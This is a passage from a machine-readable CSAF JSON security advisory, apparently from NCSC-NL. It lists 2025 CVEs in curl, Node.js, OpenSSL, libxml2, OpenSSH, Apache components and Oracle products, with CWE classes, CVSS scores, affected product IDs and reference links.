"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "description",
"text": "The curl update 8.14.1 addresses security vulnerabilities, including out-of-bounds reads, proxy cache poisoning, and a bug allowing insecure sites to override secure cookies, alongside a denial of service vulnerability in Oracle Communications Unified Inventory Management.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9086 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9086.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-9086"
},
{
"cve": "CVE-2025-25724",
"cwe": {
"id": "CWE-252",
"name": "Unchecked Return Value"
},
"notes": [
{
"category": "other",
"text": "Unchecked Return Value",
"title": "CWE-252"
},
{
"category": "description",
"text": "Multiple vulnerabilities have been identified in Oracle Communications Network Analytics Data Director and the libarchive component, affecting system integrity and availability, with CVSS scores indicating significant risks.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-25724 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-25724.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-25724"
},
{
"cve": "CVE-2025-27210",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "description",
"text": "Node.js versions 20.x, 22.x, and 24.x have an incomplete fix for CVE-2025-23084 affecting Windows device names and the `path.join` API, while Oracle Communications\u0027 Cloud Native Environment has a non-exploitable Security-in-Depth issue.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27210 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27210.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-27210"
},
{
"cve": "CVE-2025-27533",
"cwe": {
"id": "CWE-789",
"name": "Memory Allocation with Excessive Size Value"
},
"notes": [
{
"category": "other",
"text": "Memory Allocation with Excessive Size Value",
"title": "CWE-789"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Apache ActiveMQ and Oracle products allow for denial of service attacks due to improper validation and excessive memory allocation, affecting various versions and configurations.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:D/RE:M/U:Red",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27533 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27533.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-27533"
},
{
"cve": "CVE-2025-27553",
"cwe": {
"id": "CWE-23",
"name": "Relative Path Traversal"
},
"notes": [
{
"category": "other",
"text": "Relative Path Traversal",
"title": "CWE-23"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Middleware and Apache Commons VFS expose critical data and allow unauthorized file access, with significant risks associated with their exploitation.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27553 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27553.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-27553"
},
{
"cve": "CVE-2025-27587",
"cwe": {
"id": "CWE-385",
"name": "Covert Timing Channel"
},
"notes": [
{
"category": "other",
"text": "Covert Timing Channel",
"title": "CWE-385"
},
{
"category": "description",
"text": "OpenSSL versions 3.0.0 to 3.3.2 on PowerPC are vulnerable to a Minerva attack, while Oracle Communications Cloud Native Core Certificate Management 25.1.200 has a critical data access vulnerability, and OpenSSL 3 has addressed timing side channel issues.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:P/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27587 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27587.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-27587"
},
{
"cve": "CVE-2025-27817",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"notes": [
{
"category": "other",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Apache Kafka and Oracle applications allow unauthorized access to sensitive data, with notable SSRF risks and CVSS scores of 7.5 for Oracle products.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27817 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27817.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-27817"
},
{
"cve": "CVE-2025-32415",
"cwe": {
"id": "CWE-1284",
"name": "Improper Validation of Specified Quantity in Input"
},
"notes": [
{
"category": "other",
"text": "Improper Validation of Specified Quantity in Input",
"title": "CWE-1284"
},
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "description",
"text": "Multiple vulnerabilities have been identified in Oracle Java SE and libxml2, allowing for potential system compromise and denial of service, with CVSS scores of 7.5 for several issues.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-32415 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-32415.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-32415"
},
{
"cve": "CVE-2025-32728",
"cwe": {
"id": "CWE-440",
"name": "Expected Behavior Violation"
},
"notes": [
{
"category": "other",
"text": "Expected Behavior Violation",
"title": "CWE-440"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle Enterprise Communications Broker, OpenSSH, and HP-UX Secure Shell daemon could lead to unauthorized data access and system compromise, with varying CVSS scores and exploitation potential.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-32728 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-32728.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-32728"
},
{
"cve": "CVE-2025-32990",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"notes": [
{
"category": "other",
"text": "Heap-based Buffer Overflow",
"title": "CWE-122"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Communications Unified Inventory Management and GnuTLS\u0027s certtool expose systems to denial-of-service and unauthorized data access, with significant integrity impacts and a CVSS score of 8.2 for Oracle\u0027s flaw.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-32990 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-32990.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-32990"
},
{
"cve": "CVE-2025-48734",
"cwe": {
"id": "CWE-284",
"name": "Improper Access Control"
},
"notes": [
{
"category": "other",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "description",
"text": "Recent updates to Apache Commons BeanUtils address multiple vulnerabilities, including arbitrary code execution risks and unauthorized access to Java enum properties, affecting versions prior to 1.11.0 and 2.0.0-M2.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-48734 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48734.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-48734"
},
{
"cve": "CVE-2025-48924",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Recursion",
